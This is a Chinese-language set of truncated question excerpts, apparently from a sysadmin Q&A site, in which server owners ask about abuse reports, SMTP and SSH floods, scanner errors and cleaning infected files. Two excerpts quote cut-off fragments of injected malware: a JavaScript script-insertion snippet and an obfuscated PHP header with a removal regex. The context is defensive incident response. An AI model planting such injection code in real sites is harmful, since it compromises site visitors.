我的 VPS 因每小时有大量 SMTP 连接(超过 2000 个)而被暂停。但我很确定我的脚本都没有发送邮件。我使用 Google 应用和 Live 服务来收发邮件。我已使用 Fuser 阻止了端口 25,如 SF 线程以及 iptable 中所述。我添加了一个 php 包装器来检测发送邮件的 php 脚本。但直到现在我都无法检测到任何脚本。 日志条目如下所示: Sep 10 19:24:52 myservername postfix/error[31297]: 698105A75F9F: to=<[...
我们最近注意到,一个恶意脚本正在我们的域名 questoons.com 和此帐户托管的各种附加域中的多个 PHP 和 HTML 文件中插入自身。该脚本将自身插入文件末尾,代码如下: <script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttri...
我试图找出哪个 IP 是住宅代理。欺诈分数 +75 的 IP 大多开放 25 端口。 普通访问者的IP没有开放25端口。 所以你可以假设它是一个配置的IP地址,对。 我的问题 如果住宅代理 IP 正在使用/打开端口 25,是否有相对可靠的方法来公开该 IP? 是否可以直接在开放端口 25 上查询调用网站的 IP,然后相应地阻止它。....如果 ip-port_25=true,则 add_to_htaccess_blacklist;? ...
我的 WordPress 网站使用 Nginx。最近我注意到服务器容量从 8GB 增加到了 40GB。我发现 WordPress MYSQL 二进制日志占用了更多空间。每秒都会将数据库事务写入 Binlog 文件。 我想知道我们的网站/WordPress 上为什么没有大量流量。并且有这么多又大的 MySQL binlog 文件,以及每秒在 binlog 文件中记录的大量数据库事件,可能是由机器人攻击或任何插件大量使用数据库进行临时存储造成的。 到目前为止,我所做的就是运行 mysql> PURGE BINARY LOGS BEFORE '2021-08...
我的服务器 (Unix) 出现了奇怪的问题。有几家供应商报告说我的服务器正在使用 SSH 协议向他们的服务器发送恶意请求。 我已经检查了 /var/log 下的系统日志,但什么也没发现。您能指导我如何阻止我的服务器执行这些恶意活动吗? 以下是从不同供应商收到的日志,抱怨您的服务器正在发送这些请求 *May 10 05:20:03 shared05 sshd[18300]: Invalid user dmcserver from 217.138.XX.YY port 41630 May 10 05:20:...
我正在运行一个装有 Ubuntu 20.04 的 VPS。昨天我收到 VPS 提供商的通知,他们收到了一份指向我服务器 IP 的滥用报告。经过一番来回沟通后,他们要求报告者提供一些日志并将其发送给我: https://pastebin.com/FdZc5WH0 我检查了所有可能有点相关的日志,但没有任何与这些请求相关的内容。我进行了大量恶意软件/rootkit扫描,但仍然一无所获。 我开始觉得这是 IP 欺骗的情况……这是现实情况吗?我的 VPS 提供商是否应该能够检查是否是这种情况? ...
如果您在 Windows 中右键单击某个应用程序/程序,然后单击“打印”,会发生什么情况?当我右键单击某个程序图标以从桌面打开时,我差点意外地这样做了,但不小心单击了“打印”。我关闭了它,没有继续。我很好奇它是否会造成任何不良影响,或者可能只是打印图标,但我不敢在自己的系统上尝试它 :-)。我在这里问这个问题是因为如果它确实造成了不良影响,管理员可能希望了解可能发生的任何负面影响。我在 Google 上搜索了一下,没有找到任何有用的信息。 ...
当我们在网站上发布 iframe 或脚本时,我们开始收到错误页面。无论是来自管理员还是“test.php”页面上的测试脚本。 问题是我们不知道是什么生成了此页面。根据我的所有研究,似乎是在 Apache 中设置的 HEADERS 触发了此错误。 我的问题是,您认为是什么模块或配置生成了此页面?您见过这样的页面吗?我在 Google 上搜索了错误消息,但找不到任何匹配的文章。 附件是两张截图。一张是我浏览器中的错误页面,另一张是该页面的源代码。 https://ibb.co/7YTK3g7 https://ibb.co/HgzhwVm 我的 .hta...
自 2017 年 2 月 5 日起,来自 40.96.18.165 的某些东西/某人每天都会准时八次访问我的网络服务器。使用的用户代理是 Mozilla/4.0(兼容;MSIE 7.0;Windows NT 6.0)。 查找将显示该 IP 地址来自 Microsoft。 有什么险恶的事情发生吗? ...
如果我不停止创建数千个(准确地说是 9000 个)SSH 进程,我的 vServer 托管商威胁要取消我们的合同。我不知道他们是让这些进程失效了,还是他们发现这些进程时就是这样的。他们给我发了一份文件,里面有数千行代码,比如 sshd 19716 0.0 0.0 0 0 ? Z Jan25 0:00 [sshd] <defunct> sshd 19739 0.0 0.0 0 0 ? Z Jan25 0:00 [sshd] <defu...
Digital ocean 关闭了我的 droplet,以便 droplet 上有流量。我创建了一个新的 droplet(实例),但又遇到了同样的问题。 我的 nginx access.log 中充满了尝试进行 POST 调用的随机 ip 地址。我在最后粘贴了其中的一部分。 为了预防起见,我使用 fail2ban 将这些 IP 地址列入黑名单。但我需要知道问题的根源 发生这种情况是因为我的系统内有恶意软件吗,或者是我无法控制的事情? 如果是由于任何恶意包导致的,那么我该如何找到它? 2.177.28.141 - - [27/Nov/2015:12:...
在屏幕模式下运行 mallet 1.5 (# maldet -a /var/www) 后,我得到了以下返回: maldet(6070): {scan} 618017/618044 files scanned: hits 0 cleaned/usr/bin/wc: /usr/local/maldetect/tmp/.sess.6070: Datei oder Verzeichnis nicht gefunden maldet(6070): {scan} 618018/618044 files scanned: hits 0 cleaned/usr/bin/w...
所以我安装了 Linux Malware Detect (maldet) 来扫描服务器,安装一切顺利,但当我运行它时却出现错误。一堆错误,然后扫描就关闭了。 下面是我在 maldet 上运行的用于扫描特定文件夹的命令: sudo maldet -a /opt/lampp/ Linux Malware Detect v1.5 (C) 2002-2014, R-fx Networks <[email protected]> (C) 2014, Ryan MacDonald <[email ...
许多带有安全组件的反垃圾邮件或 Web 应用程序都具有禁止 IP 地址的功能。根据我的经验,任何真正邪恶的机器人、个人或其他实体都会使用无穷无尽的伪造 IP 地址。继续使用 IP 禁止来打击恶意用户有什么好处? ...
我的每个 php 文件中都有恶意代码。此恶意代码会自动粘贴在文件开头。我想使用控制台中的 UNIX 命令将其删除。 这是恶意代码: <?php $guobywgpku = '..... u=$bhpegpvvmc-1; ?> 我写了这个正则表达式, "/<\?php \$guobywgpku.*\?>/m" 并且此 RegExp 有效。我测试了它这里。 问题是,编写命令会从服务器上的每个 php 文件中删除此恶意代码。请帮帮我。 现在我有类似这样的东西。 sed "...